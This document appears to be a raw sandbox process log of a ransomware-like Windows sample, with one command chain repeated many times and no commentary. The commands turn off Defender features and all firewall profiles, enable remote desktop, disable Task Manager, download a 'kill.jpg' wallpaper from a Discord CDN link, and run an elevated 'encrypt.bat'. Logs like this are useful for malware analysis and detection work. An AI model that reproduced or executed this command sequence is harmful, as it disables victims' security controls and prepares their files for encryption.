reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5544 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

